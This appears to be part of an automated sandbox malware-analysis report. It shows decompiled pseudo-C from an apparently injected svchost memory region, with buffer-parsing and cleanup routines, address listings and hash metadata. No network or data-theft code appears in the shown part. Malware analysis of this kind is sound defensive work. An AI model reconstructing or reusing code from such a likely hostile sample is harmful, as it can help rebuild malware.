                                                                                                                                                                                                                                                                          												if( *0x4251fc() != 0) {
                                                                                                                                                                                                                                                                          													_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                          													continue;
                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                          													_v21 = 1;
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          												goto L24;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										L24:
                                                                                                                                                                                                                                                                          										if((_a16 & 0x000000ff) == 1 && (_v21 & 0x000000ff) == 0 && _v20 + 6 < _v16) {
                                                                                                                                                                                                                                                                          											_t59 = _v20 + 2; // 0x2
                                                                                                                                                                                                                                                                          											_t283 =  *0x4251fc(_v12 + _t59, 0x426cc8, 6);
                                                                                                                                                                                                                                                                          											asm("sbb eax, eax");
                                                                                                                                                                                                                                                                          											_v21 =  ~_t283 + 1;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										_v28 = 0;
                                                                                                                                                                                                                                                                          										if((_v21 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          											_v28 = E04013F50(_t292, _v120, _t394, _t395, _a4, _v20 + 2, 0xffffffff, _a16 & 0x000000ff, _a20 & 0x000000ff);
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										if(_v28 == 0) {
                                                                                                                                                                                                                                                                          											_v40 = _v20 + 2;
                                                                                                                                                                                                                                                                          											while(_v40 < _v16) {
                                                                                                                                                                                                                                                                          												_t231 = E040072C4(_v12 + _v40, 0x426c54, 2);
                                                                                                                                                                                                                                                                          												_t396 = _t396 + 0xc;
                                                                                                                                                                                                                                                                          												if(_t231 != 0) {
                                                                                                                                                                                                                                                                          													L69:
                                                                                                                                                                                                                                                                          													if(_v8 == 0) {
                                                                                                                                                                                                                                                                          														_v40 = _v40 + 1;
                                                                                                                                                                                                                                                                          														continue;
                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                          													if((_v21 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          														_t86 = _v20 + 2; // 0x2
                                                                                                                                                                                                                                                                          														_v52 = _v12 + _t86;
                                                                                                                                                                                                                                                                          														_v44 = _v40 - _v20 + 2;
                                                                                                                                                                                                                                                                          														_v48 = E04011440(_v120, _v52, _v44);
                                                                                                                                                                                                                                                                          														if(_v48 <= 0xffffffff) {
                                                                                                                                                                                                                                                                          															_t237 = E04020CE0(0x38);
                                                                                                                                                                                                                                                                          															_t396 = _t396 + 4;
                                                                                                                                                                                                                                                                          															_v108 = _t237;
                                                                                                                                                                                                                                                                          															if(_v108 == 0) {
                                                                                                                                                                                                                                                                          																_v132 = 0;
                                                                                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                                                                                          																_v132 = E04010CD0(_v108);
                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                          															_v84 = _v132;
                                                                                                                                                                                                                                                                          															_t197 = _v20 + 2; // 0x2
                                                                                                                                                                                                                                                                          															if((E040111A0(_t292, _v84, _t394, _t395, _v12 + _t197, _v40 - _v20 + 2, _v20, _v40 + 2 - _v20) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          																if(_v84 != 0) {
                                                                                                                                                                                                                                                                          																	_v116 = _v84;
                                                                                                                                                                                                                                                                          																	_v112 = _v116;
                                                                                                                                                                                                                                                                          																	if(_v112 == 0) {
                                                                                                                                                                                                                                                                          																		_v136 = 0;
                                                                                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                                                                                          																		_v136 = E04006780(_v112, 1);
                                                                                                                                                                                                                                                                          																	}
                                                                                                                                                                                                                                                                          																	_v84 = 0x666;
                                                                                                                                                                                                                                                                          																}
                                                                                                                                                                                                                                                                          																goto L69;
                                                                                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                                                                                          																_v8 = _v84;
                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                                                                                          															_v64 = E040070A0( *((intOrPtr*)(0x429f28 + _v48 * 4)));
                                                                                                                                                                                                                                                                          															_v60 = _v64 + 4;
                                                                                                                                                                                                                                                                          															_v88 = E04020CE0(_v60 + 1);
                                                                                                                                                                                                                                                                          															_v56 = _v88;
                                                                                                                                                                                                                                                                          															_push(2);
                                                                                                                                                                                                                                                                          															E04006CA0(_t292, _t394, _t395, _v56, 0x426c50);
                                                                                                                                                                                                                                                                          															_push(_v64);
                                                                                                                                                                                                                                                                          															E04006CA0(_t292, _t394, _t395, _v56 + 2,  *((intOrPtr*)(0x429f28 + _v48 * 4)));
                                                                                                                                                                                                                                                                          															_push(2);
                                                                                                                                                                                                                                                                          															E04006CA0(_t292, _t394, _t395, _v56 + _v64 + 2, 0x426c54);
                                                                                                                                                                                                                                                                          															_t396 = _t396 + 0x2c;
                                                                                                                                                                                                                                                                          															 *((char*)(_v56 + _v60)) = 0;
                                                                                                                                                                                                                                                                          															_v68 = _v40 + 2;
                                                                                                                                                                                                                                                                          															while(_v68 < _v16 - _v60) {
                                                                                                                                                                                                                                                                          																_t260 = E040072C4(_v12 + _v68, _v56, _v60);
                                                                                                                                                                                                                                                                          																_t396 = _t396 + 0xc;
                                                                                                                                                                                                                                                                          																if(_t260 != 0) {
                                                                                                                                                                                                                                                                          																	L55:
                                                                                                                                                                                                                                                                          																	_v68 = _v68 + 1;
                                                                                                                                                                                                                                                                          																	continue;
                                                                                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                                                                                          																	_v73 = 0 | _v48 == 0x00000005;
                                                                                                                                                                                                                                                                          																	_v72 = E04013F50(_t292, _v120, _t394, _t395, _a4, _v40 + 2, _v68 - _v40 + 2, _v73 & 0x000000ff, _a20 & 0x000000ff);
                                                                                                                                                                                                                                                                          																	if(_v72 == 0) {
                                                                                                                                                                                                                                                                          																		_t267 = E04020CE0(0x38);
                                                                                                                                                                                                                                                                          																		_t396 = _t396 + 4;
                                                                                                                                                                                                                                                                          																		_v92 = _t267;
                                                                                                                                                                                                                                                                          																		if(_v92 == 0) {
                                                                                                                                                                                                                                                                          																			_v124 = 0;
                                                                                                                                                                                                                                                                          																		} else {
                                                                                                                                                                                                                                                                          																			_v124 = E04010CD0(_v92);
                                                                                                                                                                                                                                                                          																		}
                                                                                                                                                                                                                                                                          																		_v80 = _v124;
                                                                                                                                                                                                                                                                          																		_t160 = _v40 + 2; // 0x2
                                                                                                                                                                                                                                                                          																		if((E04010D70(_t292, _v80, _t394, _t395,  *((intOrPtr*)(0x429f10 + _v48 * 4)), _v12 + _t160, _v68 - _v40 + 2, _v20, _v68 + _v60 - _v20) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          																			if(_v80 != 0) {
                                                                                                                                                                                                                                                                          																				_v100 = _v80;
                                                                                                                                                                                                                                                                          																				_v96 = _v100;
                                                                                                                                                                                                                                                                          																				if(_v96 == 0) {
                                                                                                                                                                                                                                                                          																					_v128 = 0;
                                                                                                                                                                                                                                                                          																				} else {
                                                                                                                                                                                                                                                                          																					_v128 = E04006780(_v96, 1);
                                                                                                                                                                                                                                                                          																				}
                                                                                                                                                                                                                                                                          																				_v80 = 0x666;
                                                                                                                                                                                                                                                                          																			}
                                                                                                                                                                                                                                                                          																			goto L55;
                                                                                                                                                                                                                                                                          																		} else {
                                                                                                                                                                                                                                                                          																			_v8 = _v80;
                                                                                                                                                                                                                                                                          																		}
                                                                                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                                                                                          																		_v8 = _v72;
                                                                                                                                                                                                                                                                          																	}
                                                                                                                                                                                                                                                                          																}
                                                                                                                                                                                                                                                                          																break;
                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                          															if(_v56 != 0) {
                                                                                                                                                                                                                                                                          																_v104 = _v56;
                                                                                                                                                                                                                                                                          																E04020CC0(_v104);
                                                                                                                                                                                                                                                                          																_t396 = _t396 + 4;
                                                                                                                                                                                                                                                                          																_v56 = 0x666;
                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                          															goto L69;
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                          														_v20 = _v40 + 2;
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          												break;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											if(_v8 == 0) {
                                                                                                                                                                                                                                                                          												goto L74;
                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											_v8 = _v28;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							if(0 != 0) {
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L76:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				goto L76;
                                                                                                                                                                                                                                                                          			}
















































                                                                                                                                                                                                                                                                          0x04013f50
                                                                                                                                                                                                                                                                          0x04013f50
                                                                                                                                                                                                                                                                          0x04013f50
                                                                                                                                                                                                                                                                          0x04013f59
                                                                                                                                                                                                                                                                          0x04013f5c
                                                                                                                                                                                                                                                                          0x04013f63
                                                                                                                                                                                                                                                                          0x04013f86
                                                                                                                                                                                                                                                                          0x04013f99
                                                                                                                                                                                                                                                                          0x04013fa4
                                                                                                                                                                                                                                                                          0x04013faf
                                                                                                                                                                                                                                                                          0x04013faf
                                                                                                                                                                                                                                                                          0x04013fb7
                                                                                                                                                                                                                                                                          0x04013fc0
                                                                                                                                                                                                                                                                          0x04013fc6
                                                                                                                                                                                                                                                                          0x04013fd4
                                                                                                                                                                                                                                                                          0x04013fe0
                                                                                                                                                                                                                                                                          0x04013ff2
                                                                                                                                                                                                                                                                          0x04013ff7
                                                                                                                                                                                                                                                                          0x04013ffc
                                                                                                                                                                                                                                                                          0x04014011
                                                                                                                                                                                                                                                                          0x04014016
                                                                                                                                                                                                                                                                          0x0401401b
                                                                                                                                                                                                                                                                          0x0401443e
                                                                                                                                                                                                                                                                          0x04013fd1
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04014021
                                                                                                                                                                                                                                                                          0x04014027
                                                                                                                                                                                                                                                                          0x04014029
                                                                                                                                                                                                                                                                          0x0401403b
                                                                                                                                                                                                                                                                          0x0401404c
                                                                                                                                                                                                                                                                          0x04014051
                                                                                                                                                                                                                                                                          0x04014054
                                                                                                                                                                                                                                                                          0x0401405a
                                                                                                                                                                                                                                                                          0x04014065
                                                                                                                                                                                                                                                                          0x0401406c
                                                                                                                                                                                                                                                                          0x04014070
                                                                                                                                                                                                                                                                          0x04014079
                                                                                                                                                                                                                                                                          0x04014038
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0401407b
                                                                                                                                                                                                                                                                          0x0401407b
                                                                                                                                                                                                                                                                          0x0401407b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04014079
                                                                                                                                                                                                                                                                          0x0401403b
                                                                                                                                                                                                                                                                          0x04014083
                                                                                                                                                                                                                                                                          0x0401408a
                                                                                                                                                                                                                                                                          0x040140ac
                                                                                                                                                                                                                                                                          0x040140b1
                                                                                                                                                                                                                                                                          0x040140b9
                                                                                                                                                                                                                                                                          0x040140be
                                                                                                                                                                                                                                                                          0x040140be
                                                                                                                                                                                                                                                                          0x040140c1
                                                                                                                                                                                                                                                                          0x040140ce
                                                                                                                                                                                                                                                                          0x040140ef
                                                                                                                                                                                                                                                                          0x040140ef
                                                                                                                                                                                                                                                                          0x040140f6
                                                                                                                                                                                                                                                                          0x0401410e
                                                                                                                                                                                                                                                                          0x0401411c
                                                                                                                                                                                                                                                                          0x04014136
                                                                                                                                                                                                                                                                          0x0401413b
                                                                                                                                                                                                                                                                          0x04014140
                                                                                                                                                                                                                                                                          0x04014429
                                                                                                                                                                                                                                                                          0x0401442d
                                                                                                                                                                                                                                                                          0x04014119
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0401442f
                                                                                                                                                                                                                                                                          0x04014146
                                                                                                                                                                                                                                                                          0x0401414c
                                                                                                                                                                                                                                                                          0x04014162
                                                                                                                                                                                                                                                                          0x04014166
                                                                                                                                                                                                                                                                          0x04014174
                                                                                                                                                                                                                                                                          0x04014187
                                                                                                                                                                                                                                                                          0x0401418e
                                                                                                                                                                                                                                                                          0x04014385
                                                                                                                                                                                                                                                                          0x0401438a
                                                                                                                                                                                                                                                                          0x0401438d
                                                                                                                                                                                                                                                                          0x04014394
                                                                                                                                                                                                                                                                          0x040143a3
                                                                                                                                                                                                                                                                          0x04014396
                                                                                                                                                                                                                                                                          0x0401439e
                                                                                                                                                                                                                                                                          0x0401439e
                                                                                                                                                                                                                                                                          0x040143ad
                                                                                                                                                                                                                                                                          0x040143d0
                                                                                                                                                                                                                                                                          0x040143e2
                                                                                                                                                                                                                                                                          0x040143f2
                                                                                                                                                                                                                                                                          0x040143f7
                                                                                                                                                                                                                                                                          0x040143fd
                                                                                                                                                                                                                                                                          0x04014404
                                                                                                                                                                                                                                                                          0x04014418
                                                                                                                                                                                                                                                                          0x04014406
                                                                                                                                                                                                                                                                          0x04014410
                                                                                                                                                                                                                                                                          0x04014410
                                                                                                                                                                                                                                                                          0x04014422
                                                                                                                                                                                                                                                                          0x04014422
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040143e4
                                                                                                                                                                                                                                                                          0x040143e7
                                                                                                                                                                                                                                                                          0x040143e7
                                                                                                                                                                                                                                                                          0x04014194
                                                                                                                                                                                                                                                                          0x040141a7
                                                                                                                                                                                                                                                                          0x040141b0
                                                                                                                                                                                                                                                                          0x040141c2
                                                                                                                                                                                                                                                                          0x040141c8
                                                                                                                                                                                                                                                                          0x040141cb
                                                                                                                                                                                                                                                                          0x040141d6
                                                                                                                                                                                                                                                                          0x040141e1
                                                                                                                                                                                                                                                                          0x040141f4
                                                                                                                                                                                                                                                                          0x040141fc
                                                                                                                                                                                                                                                                          0x0401420e
                                                                                                                                                                                                                                                                          0x04014213
                                                                                                                                                                                                                                                                          0x0401421c
                                                                                                                                                                                                                                                                          0x04014225
                                                                                                                                                                                                                                                                          0x04014233
                                                                                                                                                                                                                                                                          0x04014251
                                                                                                                                                                                                                                                                          0x04014256
                                                                                                                                                                                                                                                                          0x0401425b
                                                                                                                                                                                                                                                                          0x0401435a
                                                                                                                                                                                                                                                                          0x04014230
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04014261
                                                                                                                                                                                                                                                                          0x0401426a
                                                                                                                                                                                                                                                                          0x04014296
                                                                                                                                                                                                                                                                          0x0401429d
                                                                                                                                                                                                                                                                          0x040142b1
                                                                                                                                                                                                                                                                          0x040142b6
                                                                                                                                                                                                                                                                          0x040142b9
                                                                                                                                                                                                                                                                          0x040142c0
                                                                                                                                                                                                                                                                          0x040142cf
                                                                                                                                                                                                                                                                          0x040142c2
                                                                                                                                                                                                                                                                          0x040142ca
                                                                                                                                                                                                                                                                          0x040142ca
                                                                                                                                                                                                                                                                          0x040142d9
                                                                                                                                                                                                                                                                          0x040142fc
                                                                                                                                                                                                                                                                          0x04014319
                                                                                                                                                                                                                                                                          0x04014329
                                                                                                                                                                                                                                                                          0x0401432e
                                                                                                                                                                                                                                                                          0x04014334
                                                                                                                                                                                                                                                                          0x0401433b
                                                                                                                                                                                                                                                                          0x0401434c
                                                                                                                                                                                                                                                                          0x0401433d
                                                                                                                                                                                                                                                                          0x04014347
                                                                                                                                                                                                                                                                          0x04014347
                                                                                                                                                                                                                                                                          0x04014353
                                                                                                                                                                                                                                                                          0x04014353
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0401431b
                                                                                                                                                                                                                                                                          0x0401431e
                                                                                                                                                                                                                                                                          0x0401431e
                                                                                                                                                                                                                                                                          0x0401429f
                                                                                                                                                                                                                                                                          0x040142a2
                                                                                                                                                                                                                                                                          0x040142a2
                                                                                                                                                                                                                                                                          0x0401429d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0401425b
                                                                                                                                                                                                                                                                          0x04014363
                                                                                                                                                                                                                                                                          0x04014368
                                                                                                                                                                                                                                                                          0x0401436f
                                                                                                                                                                                                                                                                          0x04014374
                                                                                                                                                                                                                                                                          0x04014377
                                                                                                                                                                                                                                                                          0x04014377
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0401437e
                                                                                                                                                                                                                                                                          0x0401414e
                                                                                                                                                                                                                                                                          0x04014154
                                                                                                                                                                                                                                                                          0x04014154
                                                                                                                                                                                                                                                                          0x0401414c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04014140
                                                                                                                                                                                                                                                                          0x0401443a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0401443c
                                                                                                                                                                                                                                                                          0x040140f8
                                                                                                                                                                                                                                                                          0x040140fb
                                                                                                                                                                                                                                                                          0x040140fb
                                                                                                                                                                                                                                                                          0x040140f6
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04013ffe
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04013ffc
                                                                                                                                                                                                                                                                          0x04014445
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04013f9b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04013f88
                                                                                                                                                                                                                                                                          0x0401444b
                                                                                                                                                                                                                                                                          0x04014451
                                                                                                                                                                                                                                                                          0x04014451
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _memcmp
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2931989736-0
                                                                                                                                                                                                                                                                          • Opcode ID: 4ab6c835b3a8d386f7d6cb5b157b7cd7d659ba90d45b0f81057a5aa373f928b3
                                                                                                                                                                                                                                                                          • Instruction ID: 1232f30742209602bb969d2521b285a9e46184637cee8bf4b984800216b21bdb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ab6c835b3a8d386f7d6cb5b157b7cd7d659ba90d45b0f81057a5aa373f928b3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0EF125B0E04219DFDB14DFA8D894BEEBBB1BF48308F148119E415BB2A5D774AA41CF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04023C90(intOrPtr __ecx) {
                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                          				intOrPtr _v76;
                                                                                                                                                                                                                                                                          				intOrPtr _v80;
                                                                                                                                                                                                                                                                          				intOrPtr _v84;
                                                                                                                                                                                                                                                                          				intOrPtr _v88;
                                                                                                                                                                                                                                                                          				intOrPtr _v92;
                                                                                                                                                                                                                                                                          				intOrPtr _v96;
                                                                                                                                                                                                                                                                          				intOrPtr _v100;
                                                                                                                                                                                                                                                                          				signed int _v104;
                                                                                                                                                                                                                                                                          				signed int _v108;
                                                                                                                                                                                                                                                                          				signed int _v112;
                                                                                                                                                                                                                                                                          				signed int _v116;
                                                                                                                                                                                                                                                                          				signed int _v120;
                                                                                                                                                                                                                                                                          				signed int _v124;
                                                                                                                                                                                                                                                                          				intOrPtr _v128;
                                                                                                                                                                                                                                                                          				intOrPtr _t210;
                                                                                                                                                                                                                                                                          				void* _t213;
                                                                                                                                                                                                                                                                          				void* _t324;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v100 = __ecx;
                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_v100 + 0x58)) != 0) {
                                                                                                                                                                                                                                                                          					_v28 =  *((intOrPtr*)(_v100 + 0x58));
                                                                                                                                                                                                                                                                          					_v24 = _v28;
                                                                                                                                                                                                                                                                          					if(_v24 == 0) {
                                                                                                                                                                                                                                                                          						_v104 = 0;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_v104 = E040050D0(_v24, 1);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_v100 + 0x58)) = 0x666;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_v100 + 4)) != 0) {
                                                                                                                                                                                                                                                                          					_v32 =  *((intOrPtr*)(_v100 + 4));
                                                                                                                                                                                                                                                                          					E04020CC0(_v32);
                                                                                                                                                                                                                                                                          					_t324 = _t324 + 4;
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_v100 + 4)) = 0x666;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_v100 + 0x14)) != 0) {
                                                                                                                                                                                                                                                                          					_v40 =  *((intOrPtr*)(_v100 + 0x14));
                                                                                                                                                                                                                                                                          					_v36 = _v40;
                                                                                                                                                                                                                                                                          					if(_v36 == 0) {
                                                                                                                                                                                                                                                                          						_v108 = 0;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_v108 = E04005100(_v36, 1);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_v100 + 0x14)) = 0x666;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_t210 = _v100;
                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t210 + 0x18)) != 0) {
                                                                                                                                                                                                                                                                          					_v48 =  *((intOrPtr*)(_v100 + 0x18));
                                                                                                                                                                                                                                                                          					_t210 = _v48;
                                                                                                                                                                                                                                                                          					_v44 = _t210;
                                                                                                                                                                                                                                                                          					if(_v44 == 0) {
                                                                                                                                                                                                                                                                          						_v112 = 0;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_t210 = E04005130(_v44, 1);
                                                                                                                                                                                                                                                                          						_v112 = _t210;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_v100 + 0x18)) = 0x666;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_v100 + 0x20)) > 0) {
                                                                                                                                                                                                                                                                          					_t210 = _v100;
                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t210 + 0x1c)) != 0) {
                                                                                                                                                                                                                                                                          						_v8 = 0;
                                                                                                                                                                                                                                                                          						while(_v8 <  *((intOrPtr*)(_v100 + 0x20))) {
                                                                                                                                                                                                                                                                          							if( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x1c)) + _v8 * 4)) != 0) {
                                                                                                                                                                                                                                                                          								_v56 =  *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x1c)) + _v8 * 4));
                                                                                                                                                                                                                                                                          								_v52 = _v56;
                                                                                                                                                                                                                                                                          								if(_v52 == 0) {
                                                                                                                                                                                                                                                                          									_v116 = 0;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_v116 = E04005160(_v52, 1);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								 *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x1c)) + _v8 * 4)) = 0x666;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_t210 = _v100;
                                                                                                                                                                                                                                                                          						if( *((intOrPtr*)(_t210 + 0x1c)) != 0) {
                                                                                                                                                                                                                                                                          							_v60 =  *((intOrPtr*)(_v100 + 0x1c));
                                                                                                                                                                                                                                                                          							_t210 = E04020CC0(_v60);
                                                                                                                                                                                                                                                                          							_t324 = _t324 + 4;
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_v100 + 0x1c)) = 0x666;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_v100 + 0x2c)) > 0) {
                                                                                                                                                                                                                                                                          					_t210 = _v100;
                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t210 + 0x28)) != 0) {
                                                                                                                                                                                                                                                                          						_v12 = 0;
                                                                                                                                                                                                                                                                          						while(_v12 <  *((intOrPtr*)(_v100 + 0x2c))) {
                                                                                                                                                                                                                                                                          							if( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x28)) + _v12 * 4)) != 0) {
                                                                                                                                                                                                                                                                          								_v68 =  *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x28)) + _v12 * 4));
                                                                                                                                                                                                                                                                          								_v64 = _v68;
                                                                                                                                                                                                                                                                          								if(_v64 == 0) {
                                                                                                                                                                                                                                                                          									_v120 = 0;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_v120 = E04005190(_v64, 1);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								 *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x28)) + _v12 * 4)) = 0x666;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_t210 = _v100;
                                                                                                                                                                                                                                                                          						if( *((intOrPtr*)(_t210 + 0x28)) != 0) {
                                                                                                                                                                                                                                                                          							_v72 =  *((intOrPtr*)(_v100 + 0x28));
                                                                                                                                                                                                                                                                          							_t210 = E04020CC0(_v72);
                                                                                                                                                                                                                                                                          							_t324 = _t324 + 4;
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_v100 + 0x28)) = 0x666;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				if( *((intOrPtr*)(_v100 + 0x38)) > 0) {
                                                                                                                                                                                                                                                                          					_t210 = _v100;
                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t210 + 0x34)) != 0) {
                                                                                                                                                                                                                                                                          						_v16 = 0;
                                                                                                                                                                                                                                                                          						while(_v16 <  *((intOrPtr*)(_v100 + 0x38))) {
                                                                                                                                                                                                                                                                          							if( *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x34)) + _v16 * 4)) != 0) {
                                                                                                                                                                                                                                                                          								_v80 =  *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x34)) + _v16 * 4));
                                                                                                                                                                                                                                                                          								_v76 = _v80;
                                                                                                                                                                                                                                                                          								if(_v76 == 0) {
                                                                                                                                                                                                                                                                          									_v124 = 0;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_v124 = E040051C0(_v76, 1);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								 *((intOrPtr*)( *((intOrPtr*)(_v100 + 0x34)) + _v16 * 4)) = 0x666;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                          						}
